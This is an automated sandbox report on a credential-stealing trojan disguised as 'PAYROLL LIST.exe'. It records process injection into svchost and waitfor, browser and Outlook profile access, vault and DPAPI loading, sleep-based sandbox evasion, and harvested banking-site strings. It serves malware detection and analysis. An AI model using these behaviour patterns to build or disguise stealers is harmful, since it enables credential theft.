Source: PAYROLL LIST.exe, 00000000.00000003.2122087319.0000000003463000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PAYROLL LIST.exe

Source: PAYROLL LIST.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@15/12

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A6CE7A GetLastError,FormatMessageW,

0_2_00A6CE7A

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A5AB84 AdjustTokenPrivileges,CloseHandle,		0_2_00A5AB84
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A5B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00A5B134

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A6E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00A6E1FD

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A66532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00A66532

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A7C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_00A7C18C

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A2406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00A2406B

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

File created: C:\Users\user\AppData\Local\Temp\aut5312.tmp

Jump to behavior

Source: PAYROLL LIST.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: waitfor.exe, 00000005.00000002.4573886481.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4573886481.0000000002B20000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4573886481.0000000002AF3000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2591716332.0000000002AD2000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2591826211.0000000002AF3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PAYROLL LIST.exe	ReversingLabs: Detection: 68%
Source: PAYROLL LIST.exe	Virustotal: Detection: 57%

Source: unknown	Process created: C:\Users\user\Desktop\PAYROLL LIST.exe "C:\Users\user\Desktop\PAYROLL LIST.exe"
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAYROLL LIST.exe"
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	Process created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
Source: C:\Windows\SysWOW64\waitfor.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAYROLL LIST.exe"	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	Process created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\waitfor.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\waitfor.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: PAYROLL LIST.exe

Static file information: File size 1214464 > 1048576

Source: PAYROLL LIST.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PAYROLL LIST.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PAYROLL LIST.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PAYROLL LIST.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PAYROLL LIST.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PAYROLL LIST.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: PAYROLL LIST.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: waitfor.pdbGCTL source: svchost.exe, 00000002.00000003.2375440858.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, XQNtOWkQlf.exe, 00000004.00000002.4574454137.0000000001288000.00000004.00000020.00020000.00000000.sdmp, XQNtOWkQlf.exe, 00000004.00000003.2662841781.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: waitfor.pdb source: svchost.exe, 00000002.00000003.2375440858.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, XQNtOWkQlf.exe, 00000004.00000002.4574454137.0000000001288000.00000004.00000020.00020000.00000000.sdmp, XQNtOWkQlf.exe, 00000004.00000003.2662841781.000000000129B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XQNtOWkQlf.exe, 00000004.00000002.4571300074.000000000049E000.00000002.00000001.01000000.00000005.sdmp, XQNtOWkQlf.exe, 00000007.00000000.2474984397.000000000049E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: PAYROLL LIST.exe, 00000000.00000003.2121664519.0000000003340000.00000004.00001000.00020000.00000000.sdmp, PAYROLL LIST.exe, 00000000.00000003.2130814425.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2407866855.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2306328805.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2304045378.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2407866855.0000000003300000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2407867623.0000000004591000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4585566705.0000000004A8E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2410269610.0000000004747000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4585566705.00000000048F0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PAYROLL LIST.exe, 00000000.00000003.2121664519.0000000003340000.00000004.00001000.00020000.00000000.sdmp, PAYROLL LIST.exe, 00000000.00000003.2130814425.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2407866855.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2306328805.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2304045378.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2407866855.0000000003300000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, waitfor.exe, 00000005.00000003.2407867623.0000000004591000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4585566705.0000000004A8E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2410269610.0000000004747000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4585566705.00000000048F0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: waitfor.exe, 00000005.00000002.4573886481.0000000002A75000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4587102048.0000000004F1C000.00000004.10000000.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000002.4585605922.000000000323C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2702452245.000000001E85C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: waitfor.exe, 00000005.00000002.4573886481.0000000002A75000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4587102048.0000000004F1C000.00000004.10000000.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000002.4585605922.000000000323C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2702452245.000000001E85C000.00000004.80000000.00040000.00000000.sdmp

Source: PAYROLL LIST.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PAYROLL LIST.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PAYROLL LIST.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PAYROLL LIST.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PAYROLL LIST.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A3E01E LoadLibraryA,GetProcAddress,

0_2_00A3E01E

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A46B05 push ecx; ret	0_2_00A46B18
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041F993 push edi; iretd	2_2_0041F99F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A218 push ebp; ret	2_2_0041A219
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00405CA0 push ds; iretd	2_2_00405CA1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403580 push eax; ret	2_2_00403582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416E2A push esp; iretd	2_2_00416E2B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00419764 push ebp; ret	2_2_004197A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004167F3 push FFFFFFBEh; retf	2_2_0041683D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330225F pushad ; ret	2_2_033027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033027FA pushad ; ret	2_2_033027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033309AD push ecx; mov dword ptr [esp], ecx	2_2_033309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330283D push eax; iretd	2_2_03302858
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_049209AD push ecx; mov dword ptr [esp], ecx	5_2_049209B6
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0275E045 pushfd ; retn 1E1Fh	5_2_0275E072
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_027561D0 push ebp; ret	5_2_02756220
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0274271D push ds; iretd	5_2_0274271E
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0275C410 push edi; iretd	5_2_0275C41C
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0275C402 push edi; iretd	5_2_0275C41C
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_02760B17 pushad ; retf	5_2_02760B18
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_02760C25 push cs; ret	5_2_02760C89
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_02756C95 push ebp; ret	5_2_02756C96
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_02760C9B push edx; retf	5_2_02760C9C
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_02753270 push FFFFFFBEh; retf	5_2_027532BA
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_02761320 pushfd ; iretd	5_2_02761321
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0275F5C0 push es; ret	5_2_0275F63B
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0274DA40 push 20634F79h; retf	5_2_0274DA84
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_027538A7 push esp; iretd	5_2_027538A8
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_047E44B3 push esp; retf	5_2_047E44B5
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_047E5075 push ss; iretd	5_2_047E5088
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_047E6252 pushfd ; retf	5_2_047E625D
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_047F5242 push eax; ret	5_2_047F5244

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A88111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00A88111
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A3EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00A3EB42

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A4123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00A4123A

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	API/Special instruction interceptor: Address: BA9E14
Source: C:\Windows\SysWOW64\waitfor.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\waitfor.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\waitfor.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\waitfor.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\waitfor.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\waitfor.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\waitfor.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\waitfor.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0337096E rdtsc

2_2_0337096E

Source: C:\Windows\SysWOW64\waitfor.exe

Window / User API: threadDelayed 9777

Jump to behavior

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Evaded block: after key decision

graph_0-94709

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-95155

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\waitfor.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\waitfor.exe TID: 6068	Thread sleep count: 196 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe TID: 6068	Thread sleep time: -392000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe TID: 6068	Thread sleep count: 9777 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe TID: 6068	Thread sleep time: -19554000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe TID: 1916	Thread sleep time: -65000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe TID: 1916	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe TID: 1916	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe TID: 1916	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe TID: 1916	Thread sleep time: -33000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\waitfor.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\waitfor.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A66CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00A66CA9
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_00A660DD
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_00A663F9
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A6EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A6EB60
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A6F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00A6F5FA
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A6F56F FindFirstFileW,FindClose,	0_2_00A6F56F
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A71B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A71B2F
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A71C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A71C8A
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A71F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A71F94
Source: C:\Windows\SysWOW64\waitfor.exe	Code function: 5_2_0275CB90 FindFirstFileW,FindNextFileW,FindClose,	5_2_0275CB90

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A3DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00A3DDC0

Source: FxK39HI69.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: FxK39HI69.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: FxK39HI69.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: FxK39HI69.5.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: FxK39HI69.5.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: FxK39HI69.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: FxK39HI69.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: FxK39HI69.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: FxK39HI69.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: FxK39HI69.5.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: FxK39HI69.5.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: waitfor.exe, 00000005.00000002.4573886481.0000000002A75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: FxK39HI69.5.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: FxK39HI69.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: firefox.exe, 00000009.00000002.2710720235.00000298DE74E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: FxK39HI69.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: FxK39HI69.5.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: FxK39HI69.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: FxK39HI69.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: FxK39HI69.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
